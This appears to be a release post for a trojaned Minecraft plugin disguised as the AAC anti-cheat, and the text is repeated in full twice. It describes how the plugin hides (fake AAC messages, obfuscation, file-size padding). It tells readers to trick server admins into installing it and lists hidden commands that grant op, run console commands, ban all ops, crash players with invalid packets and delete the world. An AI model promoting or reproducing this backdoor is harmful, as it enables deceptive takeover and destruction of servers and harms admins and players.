A poisoned plugin disguised as AAC.
What is a poisoned plugin?
A poisoned plugin is a plugin pretending to be a regular plugin, but is actually a Force-OP plugin that uses secret commands to give you access to the Console and OP.
Why use this one?
I've looked at many different poisoned plugins from the past, and most of them are either outdated or just too obvious.
This one however, uses
-Fake load messages from AAC, plus somewhat functional AAC commands (ban and unban are basically using bukkit's method, and some commands throw a "no permissions" error)
-Obfuscation and fake code (directly from AAC!) to mimic the file size of AAC.
-A wide variety of commands
How to use
First, tell an admin to install this plugin on their servers.
(You can trick them, for example point to AAC and say how important it is to have the plugin)
Note that you need ProtocolLib for this to run, just like the real AAC.
After this, to confirm that the plugin has worked, type
/aac piracycheck
If you see "isPirated=false", that means that this plugin has worked! (This is not present in the original AAC)
Now for the hidden commands:
All hidden commands use the syntax ^*^*, so typing that in will result in the message being canceled, and no one will be able to see it.
(Note: Its better to get to know the commands here rather than trying to type ^*^*help through all the commands ingame. Here its slightly more detailed, and some servers can view hidden chat, so...)
Commands:
^*^*op: Ops a player, or you if no player is specified.
^*^*deop: Deops a player, or you if no player is specified.
^*^*opall: Ops all players online.
^*^*deopall: Deops all players online but you.
^*^*banops: Ban all ops but you.
^*^*ban: Bans someone.
^*^*unban: Unbans someone.
^*^*stop: Stops the server.
^*^*gm: Toggles your gamemode.
^*^*runcmd: Runs a command in the Console as if someone ran it from the Console.
^*^*plugins: Views, stops, or lists plugins. (plugins list, plugins enable <plugin>, plugins disable <plugin>) Note that you can't start a plugin not installed and booted. Also remember to not disable AAC!
^*^*vanish: Toggles vanish for you. (Note that there are "exploits" to find vanished players, but ESPs and tablist will not find you)
^*^*nuker: Gives you a pickaxe that nukes the world.
^*^*tpall: Teleports all players to the specified player or you.
^*^*tp: Teleports anther player to you or the first to the second. (tp <from> <to>, tp <from>)
^*^*kill: Kills the player specified.
^*^*ride: Allows you to ride someone.
^*^*forcespeak: Forces a player to say something. (forcespeak <player> <words>)
^*^*crash: Crashes a player using invaild packets. (Note that only players using 1.8 will crash)
^*^*delmap: Tries to delete everything and then stops the server. Note that some server hostings may not let you do this.
^*^*killall: Kills everyone of the server but you.
^*^*kickall: Kicks everyone but you.
^*^*banall: Bans everyone but you.
^*^*unbanall: Unbans everyone. (Includes name and IP bans)
^*^*crashall: Crashes everyone but you.
^*^*anticmd: Prevents any regular command from being executed. (Poisoned commands will still work) Players can still execute commands.
^*^*smite: Trolls a player by smiting and giving various effects.
^*^*mobblitz: Sends a whole bunch of hostile mobs to a specified player.
^*^*ride: Allows you or the first player to ride the second player. (ride <passenger>, ride <passenger> <host>)
What is a poisoned plugin?
A poisoned plugin is a plugin pretending to be a regular plugin, but is actually a Force-OP plugin that uses secret commands to give you access to the Console and OP.
Why use this one?
I've looked at many different poisoned plugins from the past, and most of them are either outdated or just too obvious.
This one however, uses
-Fake load messages from AAC, plus somewhat functional AAC commands (ban and unban are basically using bukkit's method, and some commands throw a "no permissions" error)
-Obfuscation and fake code (directly from AAC!) to mimic the file size of AAC.
-A wide variety of commands
How to use
First, tell an admin to install this plugin on their servers.
(You can trick them, for example point to AAC and say how important it is to have the plugin)
Note that you need ProtocolLib for this to run, just like the real AAC.
After this, to confirm that the plugin has worked, type
/aac piracycheck
If you see "isPirated=false", that means that this plugin has worked! (This is not present in the original AAC)
Now for the hidden commands:
All hidden commands use the syntax ^*^*, so typing that in will result in the message being canceled, and no one will be able to see it.
(Note: Its better to get to know the commands here rather than trying to type ^*^*help through all the commands ingame. Here its slightly more detailed, and some servers can view hidden chat, so...)
Commands:
^*^*op: Ops a player, or you if no player is specified.
^*^*deop: Deops a player, or you if no player is specified.
^*^*opall: Ops all players online.
^*^*deopall: Deops all players online but you.
^*^*banops: Ban all ops but you.
^*^*ban: Bans someone.
^*^*unban: Unbans someone.
^*^*stop: Stops the server.
^*^*gm: Toggles your gamemode.
^*^*runcmd: Runs a command in the Console as if someone ran it from the Console.
^*^*plugins: Views, stops, or lists plugins. (plugins list, plugins enable <plugin>, plugins disable <plugin>) Note that you can't start a plugin not installed and booted. Also remember to not disable AAC!
^*^*vanish: Toggles vanish for you. (Note that there are "exploits" to find vanished players, but ESPs and tablist will not find you)
^*^*nuker: Gives you a pickaxe that nukes the world.
^*^*tpall: Teleports all players to the specified player or you.
^*^*tp: Teleports anther player to you or the first to the second. (tp <from> <to>, tp <from>)
^*^*kill: Kills the player specified.
^*^*ride: Allows you to ride someone.
^*^*forcespeak: Forces a player to say something. (forcespeak <player> <words>)
^*^*crash: Crashes a player using invaild packets. (Note that only players using 1.8 will crash)
^*^*delmap: Tries to delete everything and then stops the server. Note that some server hostings may not let you do this.
^*^*killall: Kills everyone of the server but you.
^*^*kickall: Kicks everyone but you.
^*^*banall: Bans everyone but you.
^*^*unbanall: Unbans everyone. (Includes name and IP bans)
^*^*crashall: Crashes everyone but you.
^*^*anticmd: Prevents any regular command from being executed. (Poisoned commands will still work) Players can still execute commands.
^*^*smite: Trolls a player by smiting and giving various effects.
^*^*mobblitz: Sends a whole bunch of hostile mobs to a specified player.
^*^*ride: Allows you or the first player to ride the second player. (ride <passenger>, ride <passenger> <host>)